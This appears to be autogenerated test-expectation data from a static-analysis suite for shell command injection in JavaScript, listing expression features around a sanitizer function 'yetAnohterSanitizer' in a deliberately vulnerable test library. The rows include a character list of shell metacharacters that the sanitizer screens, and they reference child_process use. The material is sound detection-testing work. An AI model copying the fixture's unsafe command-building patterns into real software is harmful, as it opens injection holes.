autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:15 | s[i] === '[' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:15 | s[i] === '[' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:15 | s[i] === '[' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:15 | s[i] === '[' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:4:382:15 | s[i] === '[' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:6:382:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:6:382:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:6:382:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:6:382:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:6:382:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:13:382:15 | '[' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:13:382:15 | '[' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:13:382:15 | '[' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:13:382:15 | '[' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:382:13:382:15 | '[' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:15 | s[i] === ']' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:15 | s[i] === ']' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:15 | s[i] === ']' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:15 | s[i] === ']' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:4:383:15 | s[i] === ']' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:6:383:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:6:383:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:6:383:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:6:383:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:6:383:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:13:383:15 | ']' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:13:383:15 | ']' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:13:383:15 | ']' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:13:383:15 | ']' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:383:13:383:15 | ']' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:15 | s[i] === '\|' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:15 | s[i] === '\|' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:15 | s[i] === '\|' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:15 | s[i] === '\|' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:4:384:15 | s[i] === '\|' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:6:384:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:6:384:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:6:384:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:6:384:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:6:384:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 